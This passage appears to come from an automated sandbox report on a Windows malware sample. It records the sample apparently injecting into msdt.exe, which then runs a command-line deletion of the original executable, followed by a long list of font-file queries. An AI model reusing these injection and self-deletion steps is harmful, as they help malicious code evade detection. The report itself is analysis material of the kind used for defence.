          Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000000.337048787.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Users\user\Desktop\divpCHa0h7.exe VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
